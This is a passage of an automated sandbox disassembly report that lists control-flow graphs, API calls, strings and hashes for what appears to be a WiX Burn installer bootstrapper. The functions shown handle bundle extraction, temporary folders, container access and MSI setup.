• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
• API String ID: 32694325-1564579409
• Opcode ID: 091e4ddbcb6468803d9ae3c107ef963f5a0f771f45a4c73a0bc87824795e720d
• Instruction ID: 955771d9b7f86bee185e1ad013505abc0b2d545c966696c3f86d2fb00a8cca85
• Opcode Fuzzy Hash: 091e4ddbcb6468803d9ae3c107ef963f5a0f771f45a4c73a0bc87824795e720d
• Instruction Fuzzy Hash: 6FA1B572A44615BADB169AA4CC85FEAB77CBF00710F00062BF915E7340E738E954DBA1

Control-flow Graph
control_flow_graph 1253 7d86d0-7d871e CreateFileW 1254 7d8764-7d8774 call 80490d 1253->1254 1255 7d8720-7d872a GetLastError 1253->1255 1263 7d878c-7d8797 call 803edd 1254->1263 1264 7d8776-7d8787 call 800237 1254->1264 1256 7d872c-7d8735 1255->1256 1257 7d8737 1255->1257 1256->1257 1259 7d873e-7d875f call 7c3821 call 800237 1257->1259 1260 7d8739 1257->1260 1277 7d8908-7d891a call 7ee06f 1259->1277 1260->1259 1268 7d879c-7d87a0 1263->1268 1274 7d8901-7d8902 CloseHandle 1264->1274 1271 7d87bb-7d87c0 1268->1271 1272 7d87a2-7d87b6 call 800237 1268->1272 1271->1274 1276 7d87c6-7d87d5 SetFilePointerEx 1271->1276 1272->1274 1274->1277 1280 7d880f-7d881f call 804e3a 1276->1280 1281 7d87d7-7d87e1 GetLastError 1276->1281 1289 7d882b-7d883c SetFilePointerEx 1280->1289 1290 7d8821-7d8826 1280->1290 1283 7d87ee 1281->1283 1284 7d87e3-7d87ec 1281->1284 1286 7d87f5-7d880a call 7c3821 1283->1286 1287 7d87f0 1283->1287 1284->1283 1292 7d88f9-7d8900 call 800237 1286->1292 1287->1286 1293 7d883e-7d8848 GetLastError 1289->1293 1294 7d8876-7d8886 call 804e3a 1289->1294 1290->1292 1292->1274 1296 7d884a-7d8853 1293->1296 1297 7d8855 1293->1297 1294->1290 1305 7d8888-7d8898 call 804e3a 1294->1305 1296->1297 1300 7d885c-7d8871 call 7c3821 1297->1300 1301 7d8857 1297->1301 1300->1292 1301->1300 1305->1290 1309 7d889a-7d88ab SetFilePointerEx 1305->1309 1310 7d88ad-7d88b7 GetLastError 1309->1310 1311 7d88e2-7d88f2 call 804e3a 1309->1311 1312 7d88b9-7d88c2 1310->1312 1313 7d88c4 1310->1313 1311->1274 1319 7d88f4 1311->1319 1312->1313 1315 7d88cb-7d88e0 call 7c3821 1313->1315 1316 7d88c6 1313->1316 1315->1292 1316->1315 1319->1292
APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,007C4DBC,?,?,00000000,007C4DBC,00000000), ref: 007D8713
• GetLastError.KERNEL32 ref: 007D8720
  • Part of subcall function 00803EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00803F73
• SetFilePointerEx.KERNEL32(00000000,0080B4B8,00000000,00000000,00000000,?,00000000,0080B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D87CD
• GetLastError.KERNEL32 ref: 007D87D7
• CloseHandle.KERNELBASE(00000000,?,00000000,0080B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D8902
Strings
• Failed to copy engine from: %ls to: %ls, xrefs: 007D87A8
• Failed to seek to signature table in exe header., xrefs: 007D886C
• Failed to update signature offset., xrefs: 007D8821
• Failed to create engine file at path: %ls, xrefs: 007D8751
• cache.cpp, xrefs: 007D8744, 007D87FB, 007D8862, 007D88D1
• cabinet.dll, xrefs: 007D887B
• Failed to seek to original data in exe burn section header., xrefs: 007D88DB
• Failed to zero out original data offset., xrefs: 007D88F4
• Failed to seek to checksum in exe header., xrefs: 007D8805
• msi.dll, xrefs: 007D8814
• Failed to seek to beginning of engine file: %ls, xrefs: 007D8779
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: File$ErrorLast$CloseCreateHandlePointerRead
• String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
• API String ID: 3456208997-1976062716
• Opcode ID: 1bfcb4d0d62b5196e27bfe6b1d3c6b58aa255ed975bbeee6dcb26cda0845f680
• Instruction ID: 09a59e44e22f119e87a36ecd2c69bc9ff137ab5343367cfe51fff52f7eaf62e2
• Opcode Fuzzy Hash: 1bfcb4d0d62b5196e27bfe6b1d3c6b58aa255ed975bbeee6dcb26cda0845f680
• Instruction Fuzzy Hash: 92519772A51635ABD7525A948C46FBF7678FF04B20F11012AFE10FB381EB299C0196E7

Control-flow Graph
control_flow_graph 1321 7c762c-7c7edf InitializeCriticalSection 1322 7c7ee2-7c7f06 call 7c5623 1321->1322 1325 7c7f08-7c7f0f 1322->1325 1326 7c7f13-7c7f24 call 800237 1322->1326 1325->1322 1327 7c7f11 1325->1327 1329 7c7f27-7c7f39 call 7ee06f 1326->1329 1327->1329
APIs
• InitializeCriticalSection.KERNEL32(007D756B,007C53BD,00000000,007C5445), ref: 007C764C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalInitializeSection
• String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
• API String ID: 32694325-3635313340
• Opcode ID: ca0248c020051445d495da8ca5570874e6381f73d480ba0e46e3d887965c227d
• Instruction ID: 2a63bed07dd3c2e95de9c65122a1d5be6f42771ad0125ed40b5f1a1505f8bc0e
• Opcode Fuzzy Hash: ca0248c020051445d495da8ca5570874e6381f73d480ba0e46e3d887965c227d
• Instruction Fuzzy Hash: 34324AB0C116299BDBA5CF5ACD887CDFBB4FB49304F5086EED20CA6250C7B51A888F45

Control-flow Graph
control_flow_graph 1333 7d82ba-7d8303 call 7ef8e0 1336 7d847c-7d8489 call 7c2195 1333->1336 1337 7d8309-7d8317 GetCurrentProcess call 800879 1333->1337 1342 7d8498-7d84aa call 7ee06f 1336->1342 1343 7d848b 1336->1343 1341 7d831c-7d8329 1337->1341 1344 7d832f-7d833e GetWindowsDirectoryW 1341->1344 1345 7d83b7-7d83c5 GetTempPathW 1341->1345 1346 7d8490-7d8497 call 800237 1343->1346 1348 7d8378-7d8389 call 7c337f 1344->1348 1349 7d8340-7d834a GetLastError 1344->1349 1350 7d83ff-7d8411 UuidCreate 1345->1350 1351 7d83c7-7d83d1 GetLastError 1345->1351 1346->1342 1371 7d838b-7d8390 1348->1371 1372 7d8395-7d83ab call 7c36a3 1348->1372 1357 7d834c-7d8355 1349->1357 1358 7d8357 1349->1358 1354 7d841a-7d842f StringFromGUID2 1350->1354 1355 7d8413-7d8418 1350->1355 1359 7d83de 1351->1359 1360 7d83d3-7d83dc 1351->1360 1367 7d844d-7d846e call 7c1f13 1354->1367 1368 7d8431-7d844b call 7c3821 1354->1368 1355->1346 1357->1358 1361 7d835e-7d8373 call 7c3821 1358->1361 1362 7d8359 1358->1362 1363 7d83e5-7d83fa call 7c3821 1359->1363 1364 7d83e0 1359->1364 1360->1359 1361->1346 1362->1361 1363->1346 1364->1363 1381 7d8477 1367->1381 1382 7d8470-7d8475 1367->1382 1368->1346 1371->1346 1372->1350 1383 7d83ad-7d83b2 1372->1383 1381->1336 1382->1346 1383->1346
APIs
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,007C5489), ref: 007D8310
  • Part of subcall function 00800879: OpenProcessToken.ADVAPI32(?,00000008,?,007C53BD,00000000,?,?,?,?,?,?,?,007D769D,00000000), ref: 00800897
  • Part of subcall function 00800879: GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008A1
  • Part of subcall function 00800879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D769D,00000000), ref: 0080092B
• GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 007D8336
• GetLastError.KERNEL32 ref: 007D8340
• GetTempPathW.KERNEL32(00000104,?,00000000), ref: 007D83BD
• GetLastError.KERNEL32 ref: 007D83C7
• UuidCreate.RPCRT4(?), ref: 007D8406
Strings
• Failed to convert working folder guid into string., xrefs: 007D8446
• Failed to concat Temp directory on windows path for working folder., xrefs: 007D83AD
• cache.cpp, xrefs: 007D8364, 007D83EB, 007D843C
• Temp\, xrefs: 007D8395
• Failed to ensure windows path for working folder ended in backslash., xrefs: 007D838B
• Failed to get temp path for working folder., xrefs: 007D83F5
• Failed to create working folder guid., xrefs: 007D8413
• Failed to append bundle id on to temp path for working folder., xrefs: 007D8470
• Failed to get windows path for working folder., xrefs: 007D836E
• %ls%ls\, xrefs: 007D8458
• Failed to copy working folder path., xrefs: 007D848B
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
• String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
• API String ID: 266130487-819636856
• Opcode ID: 9b5a54bb8df89b0e0ed545364f06d1556aa0a79460c1dc2757f13122827db10f
• Instruction ID: 09ee2779d8c0ee01910c99f6f14cf19888d735265d5f3ab08696ac14c99d1c73
• Opcode Fuzzy Hash: 9b5a54bb8df89b0e0ed545364f06d1556aa0a79460c1dc2757f13122827db10f
• Instruction Fuzzy Hash: CE41C776A41725B7D770AAA48C09F9E77BCFF04B10F11416ABA49F7340EA7C9D4086E2

Control-flow Graph
control_flow_graph 1384 7e10fb-7e1127 CoInitializeEx 1385 7e113b-7e1186 call 7ff483 1384->1385 1386 7e1129-7e1136 call 800237 1384->1386 1392 7e1188-7e11ab call 7c3821 call 800237 1385->1392 1393 7e11b0-7e11d2 call 7ff4a4 1385->1393 1391 7e139e-7e13b0 call 7ee06f 1386->1391 1414 7e1397-7e1398 CoUninitialize 1392->1414 1400 7e128c-7e1297 SetEvent 1393->1400 1401 7e11d8-7e11e0 1393->1401 1405 7e1299-7e12a3 GetLastError 1400->1405 1406 7e12d6-7e12e4 WaitForSingleObject 1400->1406 1403 7e138f-7e1392 call 7ff4b4 1401->1403 1404 7e11e6-7e11ec 1401->1404 1408 7e11f2-7e11fa 1404->1408 1411 7e12a5-7e12ae 1405->1411 1412 7e12b0 1405->1412 1409 7e1318-7e1323 ResetEvent 1406->1409 1410 7e12e6-7e12f0 GetLastError 1406->1410 1419 7e11fc-7e11fe 1408->1419 1420 7e1274-7e1287 call 800237 1408->1420 1415 7e135a-7e1360 1409->1415 1416 7e1325-7e132f GetLastError 1409->1416 1421 7e12fd 1410->1421 1422 7e12f2-7e12fb 1410->1422 1411->1412 1417 7e12b4-7e12c4 call 7c3821 1412->1417 1418 7e12b2 1412->1418 1414->1391 1428 7e138a 1415->1428 1429 7e1362-7e1365 1415->1429 1423 7e133c 1416->1423 1424 7e1331-7e133a 1416->1424 1444 7e12c9-7e12d1 call 800237 1417->1444 1418->1417 1426 7e1200 1419->1426 1427 7e1211-7e1214 1419->1427 1420->1403 1431 7e12ff 1421->1431 1432 7e1301-7e1316 call 7c3821 1421->1432 1422->1421 1433 7e133e 1423->1433 1434 7e1340-7e1355 call 7c3821 1423->1434 1424->1423 1436 7e1206-7e120f 1426->1436 1437 7e1202-7e1204 1426->1437 1440 7e126e 1427->1440 1441 7e1216 1427->1441 1428->1403 1438 7e1386-7e1388 1429->1438 1439 7e1367-7e1381 call 7c3821 1429->1439 1431->1432 1432->1444 1433->1434 1434->1444 1446 7e1270-7e1272 1436->1446 1437->1446 1438->1403 1439->1444 1440->1446 1448 7e124e-7e1253 1441->1448 1449 7e125c-7e1261 1441->1449 1450 7e121d-7e1222 1441->1450 1451 7e126a-7e126c 1441->1451 1452 7e122b-7e1230 1441->1452 1453 7e1239-7e123e 1441->1453 1454 7e1247-7e124c 1441->1454 1455 7e1224-7e1229 1441->1455 1456 7e1255-7e125a 1441->1456 1457 7e1232-7e1237 1441->1457 1458 7e1263-7e1268 1441->1458 1459 7e1240-7e1245 1441->1459 1444->1403 1446->1400 1446->1420 1448->1420 1449->1420 1450->1420 1451->1420 1452->1420 1453->1420 1454->1420 1455->1420 1456->1420 1457->1420 1458->1420 1459->1420
APIs
• CoInitializeEx.OLE32(00000000,00000000), ref: 007E111D
• CoUninitialize.COMBASE ref: 007E1398
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: InitializeUninitialize
• String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
• API String ID: 3442037557-1168358783
• Opcode ID: 6d93a1e4d00217c7df8468d809c49c0dca00c43a17362342bd9d73a5104277ce
• Instruction ID: 3d602a620aea6f3622d0b822a1335473957544eb716972e6e85899839eaa038d
• Opcode Fuzzy Hash: 6d93a1e4d00217c7df8468d809c49c0dca00c43a17362342bd9d73a5104277ce
• Instruction Fuzzy Hash: EA511836E471E1D7CB2056968C07EBB2658FB0D730B624369AE21FF790D67D8C4096D2

Control-flow Graph
control_flow_graph 1465 7c42d7-7c432e InitializeCriticalSection * 2 call 7d4d05 * 2 1470 7c4334 1465->1470 1471 7c4452-7c445c call 7cb48b 1465->1471 1472 7c433a-7c4347 1470->1472 1476 7c4461-7c4465 1471->1476 1474 7c434d-7c4379 lstrlenW * 2 CompareStringW 1472->1474 1475 7c4445-7c444c 1472->1475 1477 7c43cb-7c43f7 lstrlenW * 2 CompareStringW 1474->1477 1478 7c437b-7c439e lstrlenW 1474->1478 1475->1471 1475->1472 1479 7c4474-7c447c 1476->1479 1480 7c4467-7c4473 call 800237 1476->1480 1477->1475 1484 7c43f9-7c441c lstrlenW 1477->1484 1481 7c448a-7c449f call 7c3821 1478->1481 1482 7c43a4-7c43a9 1478->1482 1480->1479 1496 7c44a4-7c44ab 1481->1496 1482->1481 1485 7c43af-7c43bf call 7c29ce 1482->1485 1488 7c44b6-7c44d0 call 7c3821 1484->1488 1489 7c4422-7c4427 1484->1489 1498 7c447f-7c4488 1485->1498 1499 7c43c5 1485->1499 1488->1496 1489->1488 1493 7c442d-7c443d call 7c29ce 1489->1493 1493->1498 1503 7c443f 1493->1503 1500 7c44ac-7c44b4 call 800237 1496->1500 1498->1500 1499->1477 1500->1479 1503->1475
APIs
• InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C4303
• InitializeCriticalSection.KERNEL32(000000D0,?,?,007C5266,?,?,00000000,?,?), ref: 007C430C
• lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,007C5266,?,?,00000000,?,?), ref: 007C4352
• lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C435C
• CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C4370
• lstrlenW.KERNEL32(burn.filehandle.attached,?,?,007C5266,?,?,00000000,?,?), ref: 007C4380
• lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C5266,?,?,00000000,?,?), ref: 007C43D0
• lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C43DA
• CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C43EE
• lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C5266,?,?,00000000,?,?), ref: 007C43FE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: lstrlen$CompareCriticalInitializeSectionString
• String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
• API String ID: 3039292287-3209860532
• Opcode ID: 95b77dd717e73396b965e5dd1c65ceac830074f0c0c5eaec829d5087ab15426f
• Instruction ID: fdc956f7deb88fdee3e96e370719e5fd817e627f47d9c03301f45e4cc71e763b
• Opcode Fuzzy Hash: 95b77dd717e73396b965e5dd1c65ceac830074f0c0c5eaec829d5087ab15426f
• Instruction Fuzzy Hash: DF519271A40655BFD764DB68CC96F9A7768FF04760F10411EFA14E7390D7B8A910CBA0

Control-flow Graph
control_flow_graph 1505 7cc28f-7cc2c1 1506 7cc32b-7cc347 GetCurrentProcess * 2 DuplicateHandle 1505->1506 1507 7cc2c3-7cc2e1 CreateFileW 1505->1507 1508 7cc349-7cc353 GetLastError 1506->1508 1509 7cc381 1506->1509 1510 7cc2e7-7cc2f1 GetLastError 1507->1510 1511 7cc383-7cc389 1507->1511 1512 7cc355-7cc35e 1508->1512 1513 7cc360 1508->1513 1509->1511 1514 7cc2fe 1510->1514 1515 7cc2f3-7cc2fc 1510->1515 1516 7cc38b-7cc391 1511->1516 1517 7cc393 1511->1517 1512->1513 1519 7cc367-7cc37f call 7c3821 1513->1519 1520 7cc362 1513->1520 1521 7cc305-7cc318 call 7c3821 1514->1521 1522 7cc300 1514->1522 1515->1514 1518 7cc395-7cc3a3 SetFilePointerEx 1516->1518 1517->1518 1524 7cc3da-7cc3e0 1518->1524 1525 7cc3a5-7cc3af GetLastError 1518->1525 1533 7cc31d-7cc326 call 800237 1519->1533 1520->1519 1521->1533 1530 7cc3fe-7cc404 1524->1530 1531 7cc3e2-7cc3e6 call 7e1741 1524->1531 1528 7cc3bc 1525->1528 1529 7cc3b1-7cc3ba 1525->1529 1534 7cc3be 1528->1534 1535 7cc3c3-7cc3d8 call 7c3821 1528->1535 1529->1528 1539 7cc3eb-7cc3ef 1531->1539 1533->1530 1534->1535 1543 7cc3f6-7cc3fd call 800237 1535->1543 1539->1530 1542 7cc3f1 1539->1542 1542->1543 1543->1530
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445), ref: 007CC2D6
• GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC2E7
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?), ref: 007CC336
• GetCurrentProcess.KERNEL32(000000FF,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC33C
• DuplicateHandle.KERNELBASE(00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC33F
• GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC349
• SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC39B
• GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC3A5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
• String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
• API String ID: 2619879409-373955632
• Opcode ID: 4571dfbd88f51dfdbe770e42d1c77934ec021b66cda632fb4dfe8c8c6668aa81
• Instruction ID: 828903e6fdaf9003cb8095c244218f8a46475b4d970c8088590e24f2d387bd40
• Opcode Fuzzy Hash: 4571dfbd88f51dfdbe770e42d1c77934ec021b66cda632fb4dfe8c8c6668aa81
• Instruction Fuzzy Hash: 7341C676140241ABDB629E199D49F1B3BA9FBC5720F21C02DFA18DB382D739C801DBA1

Control-flow Graph
control_flow_graph 1546 802af7-802b17 call 7c3838 1549 802c21-802c25 1546->1549 1550 802b1d-802b2b call 804a6c 1546->1550 1552 802c27-802c2a call 805636 1549->1552 1553 802c2f-802c35 1549->1553 1554 802b30-802b4f GetProcAddress 1550->1554 1552->1553 1556 802b51 1554->1556 1557 802b56-802b6f GetProcAddress 1554->1557 1556->1557 1558 802b71 1557->1558 1559 802b76-802b8f GetProcAddress 1557->1559 1558->1559 1560 802b91 1559->1560 1561 802b96-802baf GetProcAddress 1559->1561 1560->1561 1562 802bb1 1561->1562 1563 802bb6-802bcf GetProcAddress 1561->1563 1562->1563 1564 802bd1 1563->1564 1565 802bd6-802bef GetProcAddress 1563->1565 1564->1565 1566 802bf1 1565->1566 1567 802bf6-802c10 GetProcAddress 1565->1567 1566->1567 1568 802c12 1567->1568 1569 802c17 1567->1569 1568->1569 1569->1549
APIs
  • Part of subcall function 007C3838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3877
  • Part of subcall function 007C3838: GetLastError.KERNEL32 ref: 007C3881
  • Part of subcall function 00804A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00804A9D
• GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 00802B41
• GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 00802B61
• GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 00802B81
• GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 00802BA1
• GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 00802BC1
• GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 00802BE1
• GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 00802C01
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: AddressProc$ErrorLast$DirectorySystem
• String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
• API String ID: 2510051996-1735120554
• Opcode ID: 2f386c5db4cbd6c66b819711d3dfb6a601181932b92483ee0c00546a8a9b7bf1
• Instruction ID: f4dd3cbdf7eda524046bc29b08e9fb710500fb6a89e04db98b522fe946fc2734
• Opcode Fuzzy Hash: 2f386c5db4cbd6c66b819711d3dfb6a601181932b92483ee0c00546a8a9b7bf1
• Instruction Fuzzy Hash: A33108B0943618EFDB619F20FD06B2A7BA5FB34314F00812AE414966B0F7B5489BEF54
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,007CC3EB,?,00000000,?,007CC47F), ref: 007E1778
• GetLastError.KERNEL32(?,007CC3EB,?,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007E1781
Similarity
• API ID: CreateErrorEventLast
• String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
• API String ID: 545576003-938279966
• Opcode ID: 0202a733301de951f37a906aeb396207876a9574abaa845bde09c66b617543f0
• Instruction ID: 94a60c319ba469ac9269df278d87441d0b063d9913e46185ddb753f034283a80
• Opcode Fuzzy Hash: 0202a733301de951f37a906aeb396207876a9574abaa845bde09c66b617543f0
• Instruction Fuzzy Hash: 6521F677D4367676D32116A68C47F6B6A9CFF08BB0B424225BD11FB680E67CDC4085E1
APIs
• GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 007FFCD6
• GetProcAddress.KERNEL32(SystemFunction041), ref: 007FFCE8
• GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 007FFD2B
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFD3F
• GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 007FFD77
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 007FFD8B
Similarity
• API ID: AddressProc$ErrorLast
• String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
• API String ID: 4214558900-3191127217
• Opcode ID: a45db6738bd6fa7031777047ccff098f02d1fde14a68ec931269feff38800b11
• Instruction ID: 130287564278bd658f8def08935bfa9bb58da67c13e7523b0c2b2fde1d08f6aa
• Opcode Fuzzy Hash: a45db6738bd6fa7031777047ccff098f02d1fde14a68ec931269feff38800b11
• Instruction Fuzzy Hash: F921C832A4267A97C3319B15AE1AB266B90FF00B50F054135EE10EE3A0FF7C9C41DAE0
APIs
